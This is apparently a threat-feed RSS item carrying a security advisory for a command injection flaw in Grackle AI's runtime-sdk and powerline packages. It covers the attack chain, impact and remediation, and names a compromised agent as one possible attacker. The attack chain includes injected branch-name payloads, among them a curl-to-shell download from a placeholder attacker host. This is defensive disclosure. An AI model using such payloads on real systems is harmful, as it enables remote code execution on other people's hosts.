<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>@Grackle-Ai/Powerline (&lt;= 0.132.1) - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/@grackle-ai/powerline--0.132.1/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Fri, 03 Jul 2026 11:45:08 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/@grackle-ai/powerline--0.132.1/feed.xml" rel="self" type="application/rss+xml"/><item><title>Grackle AI Runtime-SDK RCE via Git Worktree Command Injection</title><link>https://feed.craftedsignal.io/briefs/2026-07-grackle-ai-rce/</link><pubDate>Fri, 03 Jul 2026 11:45:08 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-grackle-ai-rce/</guid><description>A command injection vulnerability (GHSA-vv65-f55v-xm6g) exists in Grackle AI's `@grackle-ai/runtime-sdk` and `@grackle-ai/powerline` components, allowing an attacker to achieve remote code execution as the PowerLine user on provisioned environments by injecting commands into unsanitized Git task branch names via the `SpawnSession` RPC.</description><content:encoded><![CDATA[<p>A critical command injection vulnerability (GHSA-vv65-f55v-xm6g) affects Grackle AI's <code>@grackle-ai/runtime-sdk</code> and <code>@grackle-ai/powerline</code> components, specifically versions <code>0.132.1</code> and earlier. The flaw stems from the <code>NODE_GIT_EXECUTOR</code> utilizing <code>shell:true</code> when executing <code>git worktree</code> operations, combined with the unsanitized <code>branch</code> name flowing from the <code>SpawnSession</code> gRPC request into the command arguments. This allows a malicious or compromised agent, or any client able to initiate a task via the <code>SpawnSession</code> RPC, to inject arbitrary shell commands. These commands are then executed with the privileges of the PowerLine user on provisioned environments, including SSH hosts, Docker containers, and Codespaces, effectively enabling remote code execution and escaping the agent's sandbox. A secondary, less impactful, argument injection vulnerability also exists due to a missing <code>--</code> separator.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains the ability to make calls to the PowerLine <code>SpawnSession</code> gRPC RPC. This could be through a compromised agent within the victim's environment, a malicious internal actor, or by exploiting another external vulnerability that exposes this RPC.</li>
<li>The attacker crafts a Git branch name containing shell metacharacters and arbitrary commands, for example, <code>x;curl http://attacker/x.sh|sh;#</code> or <code>$(touch /tmp/pwned)</code>.</li>
<li>The attacker sends a <code>SpawnSession</code> gRPC request to the PowerLine server, providing the crafted malicious branch name as a parameter within the request payload.</li>
<li>The vulnerable <code>ensureWorktree</code> function, located in <code>packages/runtime-sdk/src/worktree.ts</code>, prepares to execute a <code>git worktree add</code> command using the <code>NODE_GIT_EXECUTOR.exec</code> function.</li>
<li>Due to the <code>shell:true</code> option being implicitly passed to <code>NODE_GIT_EXECUTOR.exec</code>, Node.js concatenates the <code>git</code> command and its arguments (including the malicious branch name) into a single string.</li>
<li>This concatenated string is then passed to <code>sh -c</code>, which interprets the shell metacharacters and executes the attacker's injected commands embedded within the branch name.</li>
<li>The injected commands (e.g., <code>curl</code> to download and execute a malicious script, <code>touch</code> for arbitrary file creation) are executed by the <code>sh -c</code> process with the privileges of the PowerLine user.</li>
<li>The attacker successfully achieves remote code execution, gaining control over the targeted provisioned environment (SSH host, Docker container, or Codespace) as the PowerLine user.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability leads to remote code execution (RCE) with the privileges of the PowerLine user on any provisioned environment where the Grackle AI runtime is deployed. This allows attackers to escape the agent sandbox, gain full control over the affected host (be it an SSH host, Docker container, or Codespace), and potentially access sensitive data, escalate privileges, or establish persistence within the victim's infrastructure. While no specific victim count or targeted sectors are mentioned, any organization utilizing Grackle AI's runtime-sdk in their development or deployment pipelines is at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Prioritize patching the affected Grackle AI components to address GHSA-vv65-f55v-xm6g by updating <code>@grackle-ai/runtime-sdk</code> and <code>@grackle-ai/powerline</code> beyond version <code>0.132.1</code>.</li>
<li>Deploy the Sigma rule &quot;Detect GHSA-vv65-f55v-xm6g Grackle AI RCE via Git Worktree Injection&quot; to your SIEM and tune for your environment to identify potential exploitation attempts.</li>
<li>Review the remediation steps for GHSA-vv65-f55v-xm6g which include removing <code>shell:true</code> from <code>NODE_GIT_EXECUTOR</code> and adding <code>--</code> separators for <code>git worktree add</code> invocations.</li>
<li>Implement defense-in-depth measures by validating the <code>branch</code> parameter at the gRPC boundary in <code>grpc-server.ts</code> to reject names containing shell metacharacters or invalid Git ref rules.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>supply-chain</category><category>nodejs</category><category>git</category></item></channel></rss>